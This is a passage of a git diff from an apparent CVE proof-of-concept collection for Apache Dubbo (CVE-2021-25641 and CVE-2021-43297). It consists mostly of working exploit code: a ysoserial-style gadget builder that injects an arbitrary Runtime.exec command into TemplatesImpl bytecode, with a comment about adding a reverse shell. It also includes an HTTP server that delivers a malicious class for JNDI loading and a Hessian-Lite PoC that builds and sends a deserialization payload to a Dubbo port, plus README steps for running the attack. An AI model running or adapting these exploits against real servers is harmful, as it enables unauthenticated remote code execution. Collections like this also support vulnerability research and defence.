- public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) - throws Exception { - final T templates = tplClass.newInstance(); - - // use template gadget class - ClassPool pool = ClassPool.getDefault(); - pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); - pool.insertClassPath(new ClassClassPath(abstTranslet)); - final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); - // run command in static initializer - // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections - String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + - command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + - "\");"; - clazz.makeClassInitializer().insertAfter(cmd); - // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) - clazz.setName("ysoserial.Pwner" + System.nanoTime()); - CtClass superC = pool.get(abstTranslet.getName()); - clazz.setSuperclass(superC); - - final byte[] classBytes = clazz.toBytecode(); - - // inject class bytes into instance - Utils.setFieldValue(templates, "_bytecodes", new byte[][] { - classBytes, Utils.classAsBytes(Utils.Foo.class) - }); - - // required to make TemplatesImpl happy - Utils.setFieldValue(templates, "_name", "Pwnr"); - Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); - return templates; - } - - public static void setAccessible(AccessibleObject member) { - // quiet runtime warnings from JDK9+ - Permit.setAccessible(member); - } - - public static Field getField(final Class clazz, final String fieldName) { - Field field = null; - try { - field = clazz.getDeclaredField(fieldName); - setAccessible(field); - } - catch (NoSuchFieldException ex) { - if (clazz.getSuperclass() != null) - field = getField(clazz.getSuperclass(), fieldName); - } - return field; - } - - public static void setFieldValue(final Object obj, final 
String fieldName, final Object value) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - field.set(obj, value); - } - - public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { - final Field field = getField(obj.getClass(), fieldName); - return field.get(obj); - } - - public static Constructor getFirstCtor(final String name) throws Exception { - final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; - setAccessible(ctor); - return ctor; - } - - @SuppressWarnings ( {"unchecked"} ) - public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) - throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - setAccessible(objCons); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - setAccessible(sc); - return (T)sc.newInstance(consArgs); - } - - public static String classAsFile(final Class clazz) { - return classAsFile(clazz, true); - } - - public static String classAsFile(final Class clazz, boolean suffix) { - String str; - if (clazz.getEnclosingClass() == null) { - str = clazz.getName().replace(".", "/"); - } else { - str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); - } - if (suffix) { - str += ".class"; - } - return str; - } - - public static byte[] classAsBytes(final Class clazz) { - try { - final byte[] buffer = new byte[1024]; - final String file = classAsFile(clazz); - final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); - if (in == null) { - throw new IOException("couldn't find '" + file + "'"); - } - final ByteArrayOutputStream out = new ByteArrayOutputStream(); - int len; - while ((len = in.read(buffer)) != -1) { - out.write(buffer, 0, len); - } - 
return out.toByteArray(); - } catch (IOException e) { - throw new RuntimeException(e); - } - } - public static HashMap makeMap (Object v1, Object v2 ) throws Exception { - HashMap s = new HashMap<>(); - Utils.setFieldValue(s, "size", 2); - Class nodeC; - try { - nodeC = Class.forName("java.util.HashMap$Node"); - } - catch ( ClassNotFoundException e ) { - nodeC = Class.forName("java.util.HashMap$Entry"); - } - Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); - nodeCons.setAccessible(true); - - Object tbl = Array.newInstance(nodeC, 2); - Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); - Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); - Utils.setFieldValue(s, "table", tbl); - return s; - } - - public static Object makeXStringToStringTrigger(Object o) throws Exception { - XString x = new XString("HEYO"); - return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); - } +package DubboProtocolExploit; + +import com.nqzero.permit.Permit; +import com.sun.org.apache.xalan.internal.xsltc.DOM; +import com.sun.org.apache.xalan.internal.xsltc.TransletException; +import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet; +import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl; +import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl; +import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator; +import com.sun.org.apache.xml.internal.serializer.SerializationHandler; +import com.sun.org.apache.xpath.internal.objects.XString; +import javassist.ClassClassPath; +import javassist.ClassPool; +import javassist.CtClass; +import org.springframework.aop.target.HotSwappableTargetSource; +import sun.reflect.ReflectionFactory; + +import java.io.ByteArrayOutputStream; +import java.io.IOException; +import java.io.InputStream; +import java.io.Serializable; +import java.lang.reflect.*; +import java.util.HashMap; +import java.util.Map; + +import static 
com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl.DESERIALIZE_TRANSLET; + +/* + * Utility class - based on code found in ysoserial, includes method calls used in + * ysoserial.payloads.util specifically the Reflections, Gadgets, and ClassFiles classes. These were + * consolidated into a single util class for the sake of brevity; they are otherwise unchanged. + * + * Additionally, uses code based on marshalsec.gadgets.ToStringUtil.makeSpringAOPToStringTrigger + * to create a toString trigger + * + * ysoserial by Chris Frohoff - https://github.com/frohoff/ysoserial + * marshalsec by Moritz Bechler - https://github.com/mbechler/marshalsec + */ +public class Utils { + static { + // special case for using TemplatesImpl gadgets with a SecurityManager enabled + System.setProperty(DESERIALIZE_TRANSLET, "true"); + + // for RMI remote loading + System.setProperty("java.rmi.server.useCodebaseOnly", "false"); + } + + public static final String ANN_INV_HANDLER_CLASS = "sun.reflect.annotation.AnnotationInvocationHandler"; + + public static class StubTransletPayload extends AbstractTranslet implements Serializable { + + private static final long serialVersionUID = -5971610431559700674L; + + + public void transform (DOM document, SerializationHandler[] handlers ) throws TransletException {} + + + @Override + public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler ) throws TransletException {} + } + + // required to make TemplatesImpl happy + public static class Foo implements Serializable { + + private static final long serialVersionUID = 8207363842866235160L; + } + + public static InvocationHandler createMemoizedInvocationHandler (final Map map ) throws Exception { + return (InvocationHandler) Utils.getFirstCtor(ANN_INV_HANDLER_CLASS).newInstance(Override.class, map); + } + + public static Object createTemplatesImpl ( final String command ) throws Exception { + if ( Boolean.parseBoolean(System.getProperty("properXalan", "false")) ) { + 
return createTemplatesImpl( + command, + Class.forName("org.apache.xalan.xsltc.trax.TemplatesImpl"), + Class.forName("org.apache.xalan.xsltc.runtime.AbstractTranslet"), + Class.forName("org.apache.xalan.xsltc.trax.TransformerFactoryImpl")); + } + + return createTemplatesImpl(command, TemplatesImpl.class, AbstractTranslet.class, TransformerFactoryImpl.class); + } + + + public static T createTemplatesImpl ( final String command, Class tplClass, Class abstTranslet, Class transFactory ) + throws Exception { + final T templates = tplClass.newInstance(); + + // use template gadget class + ClassPool pool = ClassPool.getDefault(); + pool.insertClassPath(new ClassClassPath(Utils.StubTransletPayload.class)); + pool.insertClassPath(new ClassClassPath(abstTranslet)); + final CtClass clazz = pool.get(Utils.StubTransletPayload.class.getName()); + // run command in static initializer + // TODO: could also do fun things like injecting a pure-java rev/bind-shell to bypass naive protections + String cmd = "System.out.println(\"whoops!\"); java.lang.Runtime.getRuntime().exec(\"" + + command.replaceAll("\\\\","\\\\\\\\").replaceAll("\"", "\\\"") + + "\");"; + clazz.makeClassInitializer().insertAfter(cmd); + // sortarandom name to allow repeated exploitation (watch out for PermGen exhaustion) + clazz.setName("ysoserial.Pwner" + System.nanoTime()); + CtClass superC = pool.get(abstTranslet.getName()); + clazz.setSuperclass(superC); + + final byte[] classBytes = clazz.toBytecode(); + + // inject class bytes into instance + Utils.setFieldValue(templates, "_bytecodes", new byte[][] { + classBytes, Utils.classAsBytes(Utils.Foo.class) + }); + + // required to make TemplatesImpl happy + Utils.setFieldValue(templates, "_name", "Pwnr"); + Utils.setFieldValue(templates, "_tfactory", transFactory.newInstance()); + return templates; + } + + public static void setAccessible(AccessibleObject member) { + // quiet runtime warnings from JDK9+ + Permit.setAccessible(member); + } + + public static Field 
getField(final Class clazz, final String fieldName) { + Field field = null; + try { + field = clazz.getDeclaredField(fieldName); + setAccessible(field); + } + catch (NoSuchFieldException ex) { + if (clazz.getSuperclass() != null) + field = getField(clazz.getSuperclass(), fieldName); + } + return field; + } + + public static void setFieldValue(final Object obj, final String fieldName, final Object value) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + field.set(obj, value); + } + + public static Object getFieldValue(final Object obj, final String fieldName) throws Exception { + final Field field = getField(obj.getClass(), fieldName); + return field.get(obj); + } + + public static Constructor getFirstCtor(final String name) throws Exception { + final Constructor ctor = Class.forName(name).getDeclaredConstructors()[0]; + setAccessible(ctor); + return ctor; + } + + @SuppressWarnings ( {"unchecked"} ) + public static T createWithConstructor ( Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs ) + throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + setAccessible(objCons); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + setAccessible(sc); + return (T)sc.newInstance(consArgs); + } + + public static String classAsFile(final Class clazz) { + return classAsFile(clazz, true); + } + + public static String classAsFile(final Class clazz, boolean suffix) { + String str; + if (clazz.getEnclosingClass() == null) { + str = clazz.getName().replace(".", "/"); + } else { + str = classAsFile(clazz.getEnclosingClass(), false) + "$" + clazz.getSimpleName(); + } + if (suffix) { + str += ".class"; + } + return str; + } + + public static byte[] classAsBytes(final Class clazz) { + try { + final byte[] buffer = new 
byte[1024]; + final String file = classAsFile(clazz); + final InputStream in = Utils.class.getClassLoader().getResourceAsStream(file); + if (in == null) { + throw new IOException("couldn't find '" + file + "'"); + } + final ByteArrayOutputStream out = new ByteArrayOutputStream(); + int len; + while ((len = in.read(buffer)) != -1) { + out.write(buffer, 0, len); + } + return out.toByteArray(); + } catch (IOException e) { + throw new RuntimeException(e); + } + } + public static HashMap makeMap (Object v1, Object v2 ) throws Exception { + HashMap s = new HashMap<>(); + Utils.setFieldValue(s, "size", 2); + Class nodeC; + try { + nodeC = Class.forName("java.util.HashMap$Node"); + } + catch ( ClassNotFoundException e ) { + nodeC = Class.forName("java.util.HashMap$Entry"); + } + Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC); + nodeCons.setAccessible(true); + + Object tbl = Array.newInstance(nodeC, 2); + Array.set(tbl, 0, nodeCons.newInstance(0, v1, v1, null)); + Array.set(tbl, 1, nodeCons.newInstance(0, v2, v2, null)); + Utils.setFieldValue(s, "table", tbl); + return s; + } + + public static Object makeXStringToStringTrigger(Object o) throws Exception { + XString x = new XString("HEYO"); + return Utils.makeMap(new HotSwappableTargetSource(o), new HotSwappableTargetSource(x)); + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java index f8b4fc2f..c4065966 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java +++ b/cve/apache-Dubbo/2021/CVE-2021-25641/DubboProtocolExploit/src/main/java/org/apache/dubbo/demo/DemoService.java 
@@ -1,5 +1,5 @@
-package org.apache.dubbo.demo;
-
-public interface DemoService {
- public Object sayHello(Object o);
-}
+package org.apache.dubbo.demo;
+
+public interface DemoService {
+ public Object sayHello(Object o);
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
index 9651b3ac..38ac7094 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/ExecTest.java
@@ -1,7 +1,7 @@
-import java.io.IOException;
-public class ExecTest {
- public ExecTest() throws IOException {
- new java.io.IOException().printStackTrace();
- java.lang.Runtime.getRuntime().exec("calc");
- }
-}
+import java.io.IOException;
+public class ExecTest {
+ public ExecTest() throws IOException {
+ new java.io.IOException().printStackTrace();
+ java.lang.Runtime.getRuntime().exec("calc");
+ }
+}
diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
index 167cbaef..e65ac5e8 100644
--- a/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
+++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HTTPServer.java
@@ -1,107 +1,107 @@ -import com.google.common.io.Files; -import com.sun.net.httpserver.Headers; -import com.sun.net.httpserver.HttpExchange; -import com.sun.net.httpserver.HttpHandler; -import com.sun.net.httpserver.HttpServer; -import com.sun.net.httpserver.spi.HttpServerProvider; -import java.io.BufferedReader; -import java.io.File; -import java.io.IOException; -import java.io.InputStreamReader; -import java.io.OutputStream; -import java.net.InetSocketAddress; -import java.util.Iterator; -import java.util.List; -import java.util.Set; -import org.apache.commons.lang3.StringUtils; - -/** - * 解析http协议,输出http请求体 - * - * @author xuanyh - */ -public class HTTPServer { - - public static String filePath; - public static int PORT = 8080; - public static String contentType; - - public static void main(String[] args) throws IOException { - run(args); - } - - public static void run(String[] args) { - int port = PORT; - String context = "/"; - String clazz = "Calc.class"; - if (args != null && args.length > 0) { - port = Integer.parseInt(args[0]); - context = args[1]; - clazz = args[2]; - } - HttpServerProvider provider = HttpServerProvider.provider(); - HttpServer httpserver = null; - try { - httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); - } catch (IOException e) { - e.printStackTrace(); - } - //监听端口8080, - - httpserver.createContext(context, new RestGetHandler(clazz)); - httpserver.setExecutor(null); - httpserver.start(); - System.out.println("server started"); - } - - static class RestGetHandler implements HttpHandler { - - private String clazz; - - public RestGetHandler(String clazz) { - this.clazz = clazz; - } - - @Override - public void handle(HttpExchange he) throws IOException { - String requestMethod = he.getRequestMethod(); - System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( - StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" - : "?" 
+ he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); - if (requestMethod.equalsIgnoreCase("GET")) { - Headers responseHeaders = he.getResponseHeaders(); - responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); - - he.sendResponseHeaders(200, 0); - // parse request - OutputStream responseBody = he.getResponseBody(); - Headers requestHeaders = he.getRequestHeaders(); - Set keySet = requestHeaders.keySet(); - Iterator iter = keySet.iterator(); - - while (iter.hasNext()) { - String key = iter.next(); - List values = requestHeaders.get(key); - String s = key + ": " + values.toString(); - System.out.println(s); - } - System.out.println(); - BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); - StringBuilder stringBuilder = new StringBuilder(); - String line; - for (;(line = bufferedReader.readLine()) != null;) { - stringBuilder.append(line); - } - System.out.println(stringBuilder.toString()); - -// byte[] bytes = Files.toByteArray(new File(filePath == null ? 
HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); - - byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); - System.out.println(new String(bytes, 0, bytes.length)); - // send response - responseBody.write(bytes); - responseBody.close(); - } - } - } +import com.google.common.io.Files; +import com.sun.net.httpserver.Headers; +import com.sun.net.httpserver.HttpExchange; +import com.sun.net.httpserver.HttpHandler; +import com.sun.net.httpserver.HttpServer; +import com.sun.net.httpserver.spi.HttpServerProvider; +import java.io.BufferedReader; +import java.io.File; +import java.io.IOException; +import java.io.InputStreamReader; +import java.io.OutputStream; +import java.net.InetSocketAddress; +import java.util.Iterator; +import java.util.List; +import java.util.Set; +import org.apache.commons.lang3.StringUtils; + +/** + * 解析http协议,输出http请求体 + * + * @author xuanyh + */ +public class HTTPServer { + + public static String filePath; + public static int PORT = 8080; + public static String contentType; + + public static void main(String[] args) throws IOException { + run(args); + } + + public static void run(String[] args) { + int port = PORT; + String context = "/"; + String clazz = "Calc.class"; + if (args != null && args.length > 0) { + port = Integer.parseInt(args[0]); + context = args[1]; + clazz = args[2]; + } + HttpServerProvider provider = HttpServerProvider.provider(); + HttpServer httpserver = null; + try { + httpserver = provider.createHttpServer(new InetSocketAddress(port), 100); + } catch (IOException e) { + e.printStackTrace(); + } + //监听端口8080, + + httpserver.createContext(context, new RestGetHandler(clazz)); + httpserver.setExecutor(null); + httpserver.start(); + System.out.println("server started"); + } + + static class RestGetHandler implements HttpHandler { + + private String clazz; + + public RestGetHandler(String clazz) { + this.clazz = clazz; + } + + @Override + public void 
handle(HttpExchange he) throws IOException { + String requestMethod = he.getRequestMethod(); + System.out.println(requestMethod + " " + he.getRequestURI().getPath() + ( + StringUtils.isEmpty(he.getRequestURI().getRawQuery()) ? "" + : "?" + he.getRequestURI().getRawQuery()) + " " + he.getProtocol()); + if (requestMethod.equalsIgnoreCase("GET")) { + Headers responseHeaders = he.getResponseHeaders(); + responseHeaders.set("Content-Type", contentType == null ? "application/json" : contentType); + + he.sendResponseHeaders(200, 0); + // parse request + OutputStream responseBody = he.getResponseBody(); + Headers requestHeaders = he.getRequestHeaders(); + Set keySet = requestHeaders.keySet(); + Iterator iter = keySet.iterator(); + + while (iter.hasNext()) { + String key = iter.next(); + List values = requestHeaders.get(key); + String s = key + ": " + values.toString(); + System.out.println(s); + } + System.out.println(); + BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(he.getRequestBody())); + StringBuilder stringBuilder = new StringBuilder(); + String line; + for (;(line = bufferedReader.readLine()) != null;) { + stringBuilder.append(line); + } + System.out.println(stringBuilder.toString()); + +// byte[] bytes = Files.toByteArray(new File(filePath == null ? HTTPServer.class.getClassLoader().getResource(clazz).getPath() : filePath)); + + byte[] bytes = Files.toByteArray(new File("D:\\工具\\java\\fastjson反序列化\\jndi利用\\ExecTest.class")); + System.out.println(new String(bytes, 0, bytes.length)); + // send response + responseBody.write(bytes); + responseBody.close(); + } + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java index 04f8ed45..0f0eddc9 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/HessianLitePoc.java 
@@ -1,133 +1,133 @@ -package com.bitterz.dubbo; - -import com.alibaba.com.caucho.hessian.io.Hessian2Output; -import org.apache.dubbo.common.io.Bytes; -import org.apache.xbean.naming.context.ContextUtil; -import org.apache.xbean.naming.context.WritableContext; -import sun.reflect.ReflectionFactory; - -import javax.naming.Context; -import javax.naming.Reference; -import java.io.ByteArrayOutputStream; -import java.io.OutputStream; -import java.lang.reflect.Constructor; -import java.lang.reflect.Field; -import java.lang.reflect.InvocationTargetException; -import java.net.Socket; -import java.util.HashSet; -import java.util.Random; -public class HessianLitePoc { - - public static void main(String[] args) throws Exception { - - Context ctx = Reflections.createWithoutConstructor(WritableContext.class); - Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); - ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); - -// Field fullName = binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); -// fullName.setAccessible(true); - Reflections.setFieldValue(binding, "fullName", "<<<<<"); -// fullName.set(binding, "<<<<<"); // 方便定位属性值的 - - - - byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; - //############################################################################################ - // 写入binding - ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); - Hessian2Output outBinding = new Hessian2Output(binding2bytes); - outBinding.writeObject(binding); - outBinding.flushBuffer(); - //############################################################################################ - // binding序列化后的byte数组 - byte[] bindingBytes = binding2bytes.toByteArray(); - - // header. - byte[] header = new byte[16]; - // set magic number. - Bytes.short2bytes((short) 0xdabb, header); - // set request and serialization flag. 
- header[2] = (byte) ((byte) 0x80 | 0x20 | 2); - // set request id. - Bytes.long2bytes(new Random().nextInt(100000000), header, 4); - // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 - Bytes.int2bytes(bindingBytes.length*2-1, header, 12); - - // 收集header+binding - ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); - byteArrayOutputStream.write(header); - byteArrayOutputStream.write(bindingBytes); - byte[] bytes = byteArrayOutputStream.toByteArray(); - - //############################################################################################ - // 组装payload = header+binding+binding - byte[] payload = new byte[bytes.length + bindingBytes.length -1]; - for (int i = 0; i < bytes.length; i++) { - payload[i] = bytes[i]; - } - - for (int i = 0; i < bindingBytes.length; i++) { - payload[i + bytes.length-1] = bindingBytes[i]; - } - //############################################################################################ - - // 修改flag的值 - payload[2] = 0x02; - - // 输出字节流的十六进制 - for (int i = 0; i < payload.length; i++) { - System.out.print(String.format("%02X", payload[i]) + " "); - if ((i + 1) % 8 == 0) - System.out.print(" "); - if ((i + 1) % 16 == 0 ) - System.out.println(); - } - System.out.println(); - // 输出byte数组转String - System.out.println(new String(payload,0,payload.length)); -// System.exit(1); - //todo 此处填写被攻击的dubbo服务提供者地址和端口 - Socket socket = new Socket("127.0.0.1", 20880); - OutputStream outputStream = socket.getOutputStream(); - outputStream.write(payload); - outputStream.flush(); - outputStream.close(); - System.out.println("\nsend!!"); - } - - - public static class Reflections{ - public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ - Field field=null; - Class cl = obj.getClass(); - while (cl != Object.class){ - try{ - field = cl.getDeclaredField(fieldName); - if(field!=null){ - break;} - } - catch (Exception e){ - cl = cl.getSuperclass(); - } - } - if (field==null){ - 
System.out.println(obj.getClass().getName()); - System.out.println(fieldName); - } - field.setAccessible(true); - field.set(obj,fieldValue); - } - - public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); - } - - public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { - Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); - objCons.setAccessible(true); - Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); - sc.setAccessible(true); - return (T) sc.newInstance(consArgs); - } - } +package com.bitterz.dubbo; + +import com.alibaba.com.caucho.hessian.io.Hessian2Output; +import org.apache.dubbo.common.io.Bytes; +import org.apache.xbean.naming.context.ContextUtil; +import org.apache.xbean.naming.context.WritableContext; +import sun.reflect.ReflectionFactory; + +import javax.naming.Context; +import javax.naming.Reference; +import java.io.ByteArrayOutputStream; +import java.io.OutputStream; +import java.lang.reflect.Constructor; +import java.lang.reflect.Field; +import java.lang.reflect.InvocationTargetException; +import java.net.Socket; +import java.util.HashSet; +import java.util.Random; +public class HessianLitePoc { + + public static void main(String[] args) throws Exception { + + Context ctx = Reflections.createWithoutConstructor(WritableContext.class); + Reference ref = new Reference("ExecTest", "ExecTest","http://127.0.0.1:8080/"); + ContextUtil.ReadOnlyBinding binding = new ContextUtil.ReadOnlyBinding("foo", ref, ctx); + +// Field fullName = 
binding.getClass().getSuperclass().getSuperclass().getDeclaredField("fullName"); +// fullName.setAccessible(true); + Reflections.setFieldValue(binding, "fullName", "<<<<<"); +// fullName.set(binding, "<<<<<"); // 方便定位属性值的 + + + + byte [] heder2 = new byte[]{-38, -69, -30, 0, 0, 0, 0, 0, 0, 0, 0, 3, 0, 0, 0, 1}; + //############################################################################################ + // 写入binding + ByteArrayOutputStream binding2bytes = new ByteArrayOutputStream(); + Hessian2Output outBinding = new Hessian2Output(binding2bytes); + outBinding.writeObject(binding); + outBinding.flushBuffer(); + //############################################################################################ + // binding序列化后的byte数组 + byte[] bindingBytes = binding2bytes.toByteArray(); + + // header. + byte[] header = new byte[16]; + // set magic number. + Bytes.short2bytes((short) 0xdabb, header); + // set request and serialization flag. + header[2] = (byte) ((byte) 0x80 | 0x20 | 2); + // set request id. 
+ Bytes.long2bytes(new Random().nextInt(100000000), header, 4); + // 在header中记录 序列化对象 的长度,因为最后一个F被覆盖了,所以要-1 + Bytes.int2bytes(bindingBytes.length*2-1, header, 12); + + // 收集header+binding + ByteArrayOutputStream byteArrayOutputStream = new ByteArrayOutputStream(); + byteArrayOutputStream.write(header); + byteArrayOutputStream.write(bindingBytes); + byte[] bytes = byteArrayOutputStream.toByteArray(); + + //############################################################################################ + // 组装payload = header+binding+binding + byte[] payload = new byte[bytes.length + bindingBytes.length -1]; + for (int i = 0; i < bytes.length; i++) { + payload[i] = bytes[i]; + } + + for (int i = 0; i < bindingBytes.length; i++) { + payload[i + bytes.length-1] = bindingBytes[i]; + } + //############################################################################################ + + // 修改flag的值 + payload[2] = 0x02; + + // 输出字节流的十六进制 + for (int i = 0; i < payload.length; i++) { + System.out.print(String.format("%02X", payload[i]) + " "); + if ((i + 1) % 8 == 0) + System.out.print(" "); + if ((i + 1) % 16 == 0 ) + System.out.println(); + } + System.out.println(); + // 输出byte数组转String + System.out.println(new String(payload,0,payload.length)); +// System.exit(1); + //todo 此处填写被攻击的dubbo服务提供者地址和端口 + Socket socket = new Socket("127.0.0.1", 20880); + OutputStream outputStream = socket.getOutputStream(); + outputStream.write(payload); + outputStream.flush(); + outputStream.close(); + System.out.println("\nsend!!"); + } + + + public static class Reflections{ + public static void setFieldValue(Object obj, String fieldName, Object fieldValue) throws Exception{ + Field field=null; + Class cl = obj.getClass(); + while (cl != Object.class){ + try{ + field = cl.getDeclaredField(fieldName); + if(field!=null){ + break;} + } + catch (Exception e){ + cl = cl.getSuperclass(); + } + } + if (field==null){ + System.out.println(obj.getClass().getName()); + System.out.println(fieldName); + } + 
field.setAccessible(true); + field.set(obj,fieldValue); + } + + public static T createWithoutConstructor(Class classToInstantiate) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + return createWithConstructor(classToInstantiate, Object.class, new Class[0], new Object[0]); + } + + public static T createWithConstructor(Class classToInstantiate, Class constructorClass, Class[] consArgTypes, Object[] consArgs) throws NoSuchMethodException, InstantiationException, IllegalAccessException, InvocationTargetException { + Constructor objCons = constructorClass.getDeclaredConstructor(consArgTypes); + objCons.setAccessible(true); + Constructor sc = ReflectionFactory.getReflectionFactory().newConstructorForSerialization(classToInstantiate, objCons); + sc.setAccessible(true); + return (T) sc.newInstance(consArgs); + } + } } \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md index b47312f3..f39e0a8e 100644 --- a/cve/apache-Dubbo/2021/CVE-2021-43297/README.md +++ b/cve/apache-Dubbo/2021/CVE-2021-43297/README.md @@ -1,5 +1,5 @@ -漏洞描述 - -Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 -Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 +漏洞描述 + +Dubbo Hessian-Lite 3.2.11及之前版本中存在潜在RCE攻击风险。 +Hessian-Lite在遇到序列化异常时会输出相关信息,这可能导致触发某些恶意定制的Bean的toString方法,从而引发RCE攻击 编译ExecTest.java,随后在HttpServer.java中修改ExecTest.class的路径,然后执行HttpServer.main方法,最后执行HessianLitePoc.main方法 \ No newline at end of file diff --git a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml index faf28d8b..2f25d5ee 100644 --- a/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml +++ b/cve/apache-Dubbo/2021/yaml/CVE-2021-25641.yaml 
@@ -1,20 +1,20 @@
-id: CVE-2021-25641
-source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
-info:
- name: Dubbo是一个高性能优秀的服务框架。
- severity: CRITICAL
- description: |
- 每个Apache Dubbo服务器都会设置一个序列化id,告诉客户端它正在使用哪个序列化协议。但是对于 2.7.8 或 2.6.9 之前的 Dubbo 版本,攻击者可以通过篡改字节序码标志(即不遵循服务器的指令)来选择提供程序将使用的序列化 ID。这意味着,如果弱反序列化程序(如 Kryo 和 FST)以某种方式在代码范围内(例如,如果 Kryo 在某种程度上是依赖项的一部分),则未经身份验证的远程攻击者可以告诉提供程序使用弱反序列化程序,然后继续利用它。
- scope-of-influence:
- Dubbo 2.5.0 - 2.6.9
- Dubbo 2.7.0 - 2.7.8
- reference:
- - https://nvd.nist.gov/vuln/detail/CVE-2021-25641
- classification:
- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.8
- cve-id: CVE-2021-25641
- cwe-id: CWE-502
- cnvd-id: None
- kve-id: None
+id: CVE-2021-25641
+source: https://github.com/Dor-Tumarkin/CVE-2021-25641-Proof-of-Concept
+info:
+ name: Dubbo是一个高性能优秀的服务框架。
+ severity: CRITICAL
+ description: |
